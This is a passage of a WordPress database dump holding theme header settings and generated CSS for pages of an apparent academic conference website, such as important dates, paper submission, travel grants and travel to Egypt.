(9964,2638,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/r2-2.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 350px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 50px;\n  line-height: 36px;\n  color: #1e73be;\n  text-transform: uppercase;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(9965,2638,'_wp_page_template','default'),
(9966,2638,'_dt_microsite_primary_menu',''),
(9967,2638,'_dt_microsite_split_left_menu',''),
(9968,2638,'_dt_microsite_split_right_menu',''),
(9969,2638,'_dt_microsite_mobile_menu',''),
(9970,2654,'_edit_lock','1675487440:1'),
(9979,2654,'_edit_last','1'),
(9980,2654,'_wpb_vc_js_status','false'),
(9981,2654,'_dt_sidebar_position','disabled'),
(9982,2654,'_dt_sidebar_widgetarea_id','sidebar_1'),
(9983,2654,'_dt_sidebar_hide_on_mobile','0'),
(9984,2654,'_dt_footer_show','1'),
(9985,2654,'_dt_footer_widgetarea_id','sidebar_2'),
(9986,2654,'_dt_footer_hide_on_mobile','0'),
(9987,2654,'_dt_header_title','fancy'),
(9988,2654,'_dt_header_background','normal'),
(9989,2654,'_dt_header_background_below_slideshow','disabled'),
(9990,2654,'_dt_header_transparent_bg_color_scheme','light'),
(9991,2654,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(9992,2654,'_dt_header_transparent_top_bar_bg_opacity','25'),
(9993,2654,'_dt_header_transparent_bg_color','#000000'),
(9994,2654,'_dt_header_transparent_bg_opacity','50'),
(9995,2654,'_dt_header_disabled_background','normal'),
(9996,2654,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(9997,2654,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(9998,2654,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(9999,2654,'_dt_header_disabled_transparent_bg_color','#000000'),
(10000,2654,'_dt_header_disabled_transparent_bg_opacity','50'),
(10001,2654,'_dt_page_overrides_top_margin',''),
(10002,2654,'_dt_page_overrides_right_margin',''),
(10003,2654,'_dt_page_overrides_bottom_margin',''),
(10004,2654,'_dt_page_overrides_left_margin',''),
(10005,2654,'_dt_mobile_page_padding_top',''),
(10006,2654,'_dt_mobile_page_padding_right',''),
(10007,2654,'_dt_mobile_page_padding_bottom',''),
(10008,2654,'_dt_mobile_page_padding_left',''),
(10009,2654,'_dt_fancy_header_layout_heading',''),
(10010,2654,'_dt_fancy_header_title_aligment','center'),
(10011,2654,'_dt_fancy_header_height','350'),
(10012,2654,'_dt_fancy_header_padding-top','0px'),
(10013,2654,'_dt_fancy_header_padding-bottom','0px'),
(10014,2654,'_dt_fancy_header_breadcrumbs_heading',''),
(10015,2654,'_dt_fancy_header_breadcrumbs','disabled'),
(10016,2654,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(10017,2654,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(10018,2654,'_dt_fancy_header_title_heading',''),
(10019,2654,'_dt_fancy_header_title_mode','custom'),
(10020,2654,'_dt_fancy_header_title','IMPORTANT DATES'),
(10021,2654,'_dt_fancy_header_title_font_size','45'),
(10022,2654,'_dt_fancy_header_title_line_height','36'),
(10023,2654,'_dt_fancy_header_text_transform','none'),
(10024,2654,'_dt_fancy_header_title_color_mode','color'),
(10025,2654,'_dt_fancy_header_title_color','#ffffff'),
(10026,2654,'_dt_fancy_header_subtitle_heading',''),
(10027,2654,'_dt_fancy_header_subtitle',''),
(10028,2654,'_dt_fancy_header_subtitle_font_size','18'),
(10029,2654,'_dt_fancy_header_subtitle_line_height','26'),
(10030,2654,'_dt_fancy_header_subtitle_text_transform','none'),
(10031,2654,'_dt_fancy_header_subtitle_color_mode','color'),
(10032,2654,'_dt_fancy_header_subtitle_color','#ffffff'),
(10033,2654,'_dt_fancy_header_bg_heading',''),
(10034,2654,'_dt_fancy_header_bg_color','#222222'),
(10035,2654,'_dt_fancy_header_bg_image_origin','featured_image'),
(10036,2654,'_dt_fancy_header_bg_image','a:0:{}'),
(10037,2654,'_dt_fancy_header_bg_repeat','no-repeat'),
(10038,2654,'_dt_fancy_header_bg_position_x','center'),
(10039,2654,'_dt_fancy_header_bg_position_y','center'),
(10040,2654,'_dt_fancy_header_bg_fullscreen','1'),
(10041,2654,'_dt_fancy_header_bg_overlay','0'),
(10042,2654,'_dt_fancy_header_overlay_color','#000'),
(10043,2654,'_dt_fancy_header_bg_overlay_opacity','50'),
(10044,2654,'_dt_fancy_header_scroll_effect','default'),
(10045,2654,'_dt_fancy_header_bg_parallax','0.5'),
(10046,2654,'_dt_fancy_header_responsiveness_heading',''),
(10047,2654,'_dt_fancy_header_responsiveness','enabled'),
(10048,2654,'_dt_fancy_header_responsiveness_switch','778px'),
(10049,2654,'_dt_fancy_header_responsive_height','70'),
(10050,2654,'_dt_fancy_header_responsive_font_size','30'),
(10051,2654,'_dt_fancy_header_responsive_title_line_height','38'),
(10052,2654,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(10053,2654,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(10054,2654,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(10055,2654,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/imd.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 350px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 45px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(10056,2659,'_edit_lock','1675495157:1'),
(10065,2659,'_edit_last','1'),
(10066,2659,'_wpb_vc_js_status','true'),
(10067,2659,'_dt_sidebar_position','disabled'),
(10068,2659,'_dt_sidebar_widgetarea_id','sidebar_1'),
(10069,2659,'_dt_sidebar_hide_on_mobile','0'),
(10070,2659,'_dt_footer_show','1'),
(10071,2659,'_dt_footer_widgetarea_id','sidebar_2'),
(10072,2659,'_dt_footer_hide_on_mobile','0'),
(10073,2659,'_dt_header_title','fancy'),
(10074,2659,'_dt_header_background','normal'),
(10075,2659,'_dt_header_background_below_slideshow','disabled'),
(10076,2659,'_dt_header_transparent_bg_color_scheme','light'),
(10077,2659,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(10078,2659,'_dt_header_transparent_top_bar_bg_opacity','25'),
(10079,2659,'_dt_header_transparent_bg_color','#000000'),
(10080,2659,'_dt_header_transparent_bg_opacity','50'),
(10081,2659,'_dt_header_disabled_background','normal'),
(10082,2659,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(10083,2659,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(10084,2659,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(10085,2659,'_dt_header_disabled_transparent_bg_color','#000000'),
(10086,2659,'_dt_header_disabled_transparent_bg_opacity','50'),
(10087,2659,'_dt_page_overrides_top_margin',''),
(10088,2659,'_dt_page_overrides_right_margin',''),
(10089,2659,'_dt_page_overrides_bottom_margin',''),
(10090,2659,'_dt_page_overrides_left_margin',''),
(10091,2659,'_dt_mobile_page_padding_top',''),
(10092,2659,'_dt_mobile_page_padding_right',''),
(10093,2659,'_dt_mobile_page_padding_bottom',''),
(10094,2659,'_dt_mobile_page_padding_left',''),
(10095,2659,'_dt_fancy_header_layout_heading',''),
(10096,2659,'_dt_fancy_header_title_aligment','center'),
(10097,2659,'_dt_fancy_header_height','300'),
(10098,2659,'_dt_fancy_header_padding-top','0px'),
(10099,2659,'_dt_fancy_header_padding-bottom','0px'),
(10100,2659,'_dt_fancy_header_breadcrumbs_heading',''),
(10101,2659,'_dt_fancy_header_breadcrumbs','disabled'),
(10102,2659,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(10103,2659,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(10104,2659,'_dt_fancy_header_title_heading',''),
(10105,2659,'_dt_fancy_header_title_mode','custom'),
(10106,2659,'_dt_fancy_header_title','Submit Abstracts/Papers'),
(10107,2659,'_dt_fancy_header_title_font_size','50'),
(10108,2659,'_dt_fancy_header_title_line_height','36'),
(10109,2659,'_dt_fancy_header_text_transform','uppercase'),
(10110,2659,'_dt_fancy_header_title_color_mode','color'),
(10111,2659,'_dt_fancy_header_title_color','#ffffff'),
(10112,2659,'_dt_fancy_header_subtitle_heading',''),
(10113,2659,'_dt_fancy_header_subtitle',''),
(10114,2659,'_dt_fancy_header_subtitle_font_size','18'),
(10115,2659,'_dt_fancy_header_subtitle_line_height','26'),
(10116,2659,'_dt_fancy_header_subtitle_text_transform','none'),
(10117,2659,'_dt_fancy_header_subtitle_color_mode','color'),
(10118,2659,'_dt_fancy_header_subtitle_color','#ffffff'),
(10119,2659,'_dt_fancy_header_bg_heading',''),
(10120,2659,'_dt_fancy_header_bg_color','#222222'),
(10121,2659,'_dt_fancy_header_bg_image_origin','featured_image'),
(10122,2659,'_dt_fancy_header_bg_image','a:0:{}'),
(10123,2659,'_dt_fancy_header_bg_repeat','no-repeat'),
(10124,2659,'_dt_fancy_header_bg_position_x','center'),
(10125,2659,'_dt_fancy_header_bg_position_y','center'),
(10126,2659,'_dt_fancy_header_bg_fullscreen','1'),
(10127,2659,'_dt_fancy_header_bg_overlay','0'),
(10128,2659,'_dt_fancy_header_overlay_color','#000'),
(10129,2659,'_dt_fancy_header_bg_overlay_opacity','50'),
(10130,2659,'_dt_fancy_header_scroll_effect','default'),
(10131,2659,'_dt_fancy_header_bg_parallax','0.5'),
(10132,2659,'_dt_fancy_header_responsiveness_heading',''),
(10133,2659,'_dt_fancy_header_responsiveness','enabled'),
(10134,2659,'_dt_fancy_header_responsiveness_switch','778px'),
(10135,2659,'_dt_fancy_header_responsive_height','70'),
(10136,2659,'_dt_fancy_header_responsive_font_size','30'),
(10137,2659,'_dt_fancy_header_responsive_title_line_height','38'),
(10138,2659,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(10139,2659,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(10140,2659,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(10141,2659,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/s2-1.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 50px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: uppercase;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(10142,2659,'_wp_page_template','default'),
(10143,2659,'_dt_microsite_primary_menu',''),
(10144,2659,'_dt_microsite_split_left_menu',''),
(10145,2659,'_dt_microsite_split_right_menu',''),
(10146,2659,'_dt_microsite_mobile_menu',''),
(10147,2665,'_edit_lock','1692068079:1'),
(10156,2665,'_edit_last','1'),
(10157,2665,'_wpb_vc_js_status','false'),
(10158,2665,'_dt_sidebar_position','disabled'),
(10159,2665,'_dt_sidebar_widgetarea_id','sidebar_1'),
(10160,2665,'_dt_sidebar_hide_on_mobile','0'),
(10161,2665,'_dt_footer_show','1'),
(10162,2665,'_dt_footer_widgetarea_id','sidebar_2'),
(10163,2665,'_dt_footer_hide_on_mobile','0'),
(10164,2665,'_dt_header_title','fancy'),
(10165,2665,'_dt_header_background','normal'),
(10166,2665,'_dt_header_background_below_slideshow','disabled'),
(10167,2665,'_dt_header_transparent_bg_color_scheme','light'),
(10168,2665,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(10169,2665,'_dt_header_transparent_top_bar_bg_opacity','25'),
(10170,2665,'_dt_header_transparent_bg_color','#000000'),
(10171,2665,'_dt_header_transparent_bg_opacity','50'),
(10172,2665,'_dt_header_disabled_background','normal'),
(10173,2665,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(10174,2665,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(10175,2665,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(10176,2665,'_dt_header_disabled_transparent_bg_color','#000000'),
(10177,2665,'_dt_header_disabled_transparent_bg_opacity','50'),
(10178,2665,'_dt_page_overrides_top_margin',''),
(10179,2665,'_dt_page_overrides_right_margin',''),
(10180,2665,'_dt_page_overrides_bottom_margin',''),
(10181,2665,'_dt_page_overrides_left_margin',''),
(10182,2665,'_dt_mobile_page_padding_top',''),
(10183,2665,'_dt_mobile_page_padding_right',''),
(10184,2665,'_dt_mobile_page_padding_bottom',''),
(10185,2665,'_dt_mobile_page_padding_left',''),
(10186,2665,'_dt_fancy_header_layout_heading',''),
(10187,2665,'_dt_fancy_header_title_aligment','center'),
(10188,2665,'_dt_fancy_header_height','350'),
(10189,2665,'_dt_fancy_header_padding-top','0px'),
(10190,2665,'_dt_fancy_header_padding-bottom','0px'),
(10191,2665,'_dt_fancy_header_breadcrumbs_heading',''),
(10192,2665,'_dt_fancy_header_breadcrumbs','disabled'),
(10193,2665,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(10194,2665,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(10195,2665,'_dt_fancy_header_title_heading',''),
(10196,2665,'_dt_fancy_header_title_mode','custom'),
(10197,2665,'_dt_fancy_header_title','TRAVEL GRANTS'),
(10198,2665,'_dt_fancy_header_title_font_size','50'),
(10199,2665,'_dt_fancy_header_title_line_height','36'),
(10200,2665,'_dt_fancy_header_text_transform','none'),
(10201,2665,'_dt_fancy_header_title_color_mode','color'),
(10202,2665,'_dt_fancy_header_title_color','#ffffff'),
(10203,2665,'_dt_fancy_header_subtitle_heading',''),
(10204,2665,'_dt_fancy_header_subtitle',''),
(10205,2665,'_dt_fancy_header_subtitle_font_size','18'),
(10206,2665,'_dt_fancy_header_subtitle_line_height','26'),
(10207,2665,'_dt_fancy_header_subtitle_text_transform','none'),
(10208,2665,'_dt_fancy_header_subtitle_color_mode','color'),
(10209,2665,'_dt_fancy_header_subtitle_color','#ffffff'),
(10210,2665,'_dt_fancy_header_bg_heading',''),
(10211,2665,'_dt_fancy_header_bg_color','#222222'),
(10212,2665,'_dt_fancy_header_bg_image_origin','featured_image'),
(10213,2665,'_dt_fancy_header_bg_image','a:0:{}'),
(10214,2665,'_dt_fancy_header_bg_repeat','no-repeat'),
(10215,2665,'_dt_fancy_header_bg_position_x','center'),
(10216,2665,'_dt_fancy_header_bg_position_y','center'),
(10217,2665,'_dt_fancy_header_bg_fullscreen','1'),
(10218,2665,'_dt_fancy_header_bg_overlay','0'),
(10219,2665,'_dt_fancy_header_overlay_color','#000'),
(10220,2665,'_dt_fancy_header_bg_overlay_opacity','50'),
(10221,2665,'_dt_fancy_header_scroll_effect','default'),
(10222,2665,'_dt_fancy_header_bg_parallax','0.5'),
(10223,2665,'_dt_fancy_header_responsiveness_heading',''),
(10224,2665,'_dt_fancy_header_responsiveness','enabled'),
(10225,2665,'_dt_fancy_header_responsiveness_switch','200px'),
(10226,2665,'_dt_fancy_header_responsive_height','70'),
(10227,2665,'_dt_fancy_header_responsive_font_size','30'),
(10228,2665,'_dt_fancy_header_responsive_title_line_height','38'),
(10229,2665,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(10230,2665,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(10231,2665,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(10232,2665,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/0-Where-to-Stay-in-Cairo.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 350px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 50px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 200px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(10233,2669,'_edit_lock','1691948108:4'),
(10242,2669,'_edit_last','4'),
(10243,2669,'_wpb_vc_js_status','true'),
(10244,2669,'_dt_sidebar_position','disabled'),
(10245,2669,'_dt_sidebar_widgetarea_id','sidebar_1'),
(10246,2669,'_dt_sidebar_hide_on_mobile','0'),
(10247,2669,'_dt_footer_show','1'),
(10248,2669,'_dt_footer_widgetarea_id','sidebar_2'),
(10249,2669,'_dt_footer_hide_on_mobile','0'),
(10250,2669,'_dt_header_title','fancy'),
(10251,2669,'_dt_header_background','normal'),
(10252,2669,'_dt_header_background_below_slideshow','disabled'),
(10253,2669,'_dt_header_transparent_bg_color_scheme','light'),
(10254,2669,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(10255,2669,'_dt_header_transparent_top_bar_bg_opacity','25'),
(10256,2669,'_dt_header_transparent_bg_color','#000000'),
(10257,2669,'_dt_header_transparent_bg_opacity','50'),
(10258,2669,'_dt_header_disabled_background','normal'),
(10259,2669,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(10260,2669,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(10261,2669,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(10262,2669,'_dt_header_disabled_transparent_bg_color','#000000'),
(10263,2669,'_dt_header_disabled_transparent_bg_opacity','50'),
(10264,2669,'_dt_page_overrides_top_margin',''),
(10265,2669,'_dt_page_overrides_right_margin',''),
(10266,2669,'_dt_page_overrides_bottom_margin',''),
(10267,2669,'_dt_page_overrides_left_margin',''),
(10268,2669,'_dt_mobile_page_padding_top',''),
(10269,2669,'_dt_mobile_page_padding_right',''),
(10270,2669,'_dt_mobile_page_padding_bottom',''),
(10271,2669,'_dt_mobile_page_padding_left',''),
(10319,2672,'_wp_attached_file','2022/10/program.jpg'),
(10320,2672,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1224;s:6:\"height\";i:511;s:4:\"file\";s:19:\"2022/10/program.jpg\";s:8:\"filesize\";i:320881;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"program-300x125.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11941;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"program-1024x428.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:428;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70288;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"program-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8079;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"program-768x321.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:321;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48341;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(10321,2675,'_edit_lock','1675490862:1'),
(10330,2675,'_edit_last','1'),
(10331,2675,'_wpb_vc_js_status','false'),
(10332,2675,'_dt_sidebar_position','disabled'),
(10333,2675,'_dt_sidebar_widgetarea_id','sidebar_1'),
(10334,2675,'_dt_sidebar_hide_on_mobile','0'),
(10335,2675,'_dt_footer_show','1'),
(10336,2675,'_dt_footer_widgetarea_id','sidebar_2'),
(10337,2675,'_dt_footer_hide_on_mobile','0'),
(10338,2675,'_dt_header_title','fancy'),
(10339,2675,'_dt_header_background','normal'),
(10340,2675,'_dt_header_background_below_slideshow','disabled'),
(10341,2675,'_dt_header_transparent_bg_color_scheme','light'),
(10342,2675,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(10343,2675,'_dt_header_transparent_top_bar_bg_opacity','25'),
(10344,2675,'_dt_header_transparent_bg_color','#000000'),
(10345,2675,'_dt_header_transparent_bg_opacity','50'),
(10346,2675,'_dt_header_disabled_background','normal'),
(10347,2675,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(10348,2675,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(10349,2675,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(10350,2675,'_dt_header_disabled_transparent_bg_color','#000000'),
(10351,2675,'_dt_header_disabled_transparent_bg_opacity','50'),
(10352,2675,'_dt_page_overrides_top_margin',''),
(10353,2675,'_dt_page_overrides_right_margin',''),
(10354,2675,'_dt_page_overrides_bottom_margin',''),
(10355,2675,'_dt_page_overrides_left_margin',''),
(10356,2675,'_dt_mobile_page_padding_top',''),
(10357,2675,'_dt_mobile_page_padding_right',''),
(10358,2675,'_dt_mobile_page_padding_bottom',''),
(10359,2675,'_dt_mobile_page_padding_left',''),
(10360,2675,'_dt_fancy_header_layout_heading',''),
(10361,2675,'_dt_fancy_header_title_aligment','center'),
(10362,2675,'_dt_fancy_header_height','350'),
(10363,2675,'_dt_fancy_header_padding-top','0px'),
(10364,2675,'_dt_fancy_header_padding-bottom','0px'),
(10365,2675,'_dt_fancy_header_breadcrumbs_heading',''),
(10366,2675,'_dt_fancy_header_breadcrumbs','disabled'),
(10367,2675,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(10368,2675,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(10369,2675,'_dt_fancy_header_title_heading',''),
(10370,2675,'_dt_fancy_header_title_mode','custom'),
(10371,2675,'_dt_fancy_header_title','Travel To Egypt'),
(10372,2675,'_dt_fancy_header_title_font_size','50'),
(10373,2675,'_dt_fancy_header_title_line_height','36'),
(10374,2675,'_dt_fancy_header_text_transform','uppercase'),
(10375,2675,'_dt_fancy_header_title_color_mode','color'),
(10376,2675,'_dt_fancy_header_title_color','#3f3ff4'),
(10377,2675,'_dt_fancy_header_subtitle_heading',''),
(10378,2675,'_dt_fancy_header_subtitle',''),
(10379,2675,'_dt_fancy_header_subtitle_font_size','18'),
(10380,2675,'_dt_fancy_header_subtitle_line_height','26'),
(10381,2675,'_dt_fancy_header_subtitle_text_transform','none'),
(10382,2675,'_dt_fancy_header_subtitle_color_mode','color'),
(10383,2675,'_dt_fancy_header_subtitle_color','#ffffff'),
(10384,2675,'_dt_fancy_header_bg_heading',''),
(10385,2675,'_dt_fancy_header_bg_color','#222222'),
(10386,2675,'_dt_fancy_header_bg_image_origin','featured_image'),
(10387,2675,'_dt_fancy_header_bg_image','a:0:{}'),
(10388,2675,'_dt_fancy_header_bg_repeat','no-repeat'),
(10389,2675,'_dt_fancy_header_bg_position_x','center'),
(10390,2675,'_dt_fancy_header_bg_position_y','center'),
(10391,2675,'_dt_fancy_header_bg_fullscreen','1'),
(10392,2675,'_dt_fancy_header_bg_overlay','0'),
(10393,2675,'_dt_fancy_header_overlay_color','#000'),
(10394,2675,'_dt_fancy_header_bg_overlay_opacity','50'),
(10395,2675,'_dt_fancy_header_scroll_effect','default'),
(10396,2675,'_dt_fancy_header_bg_parallax','0.5'),
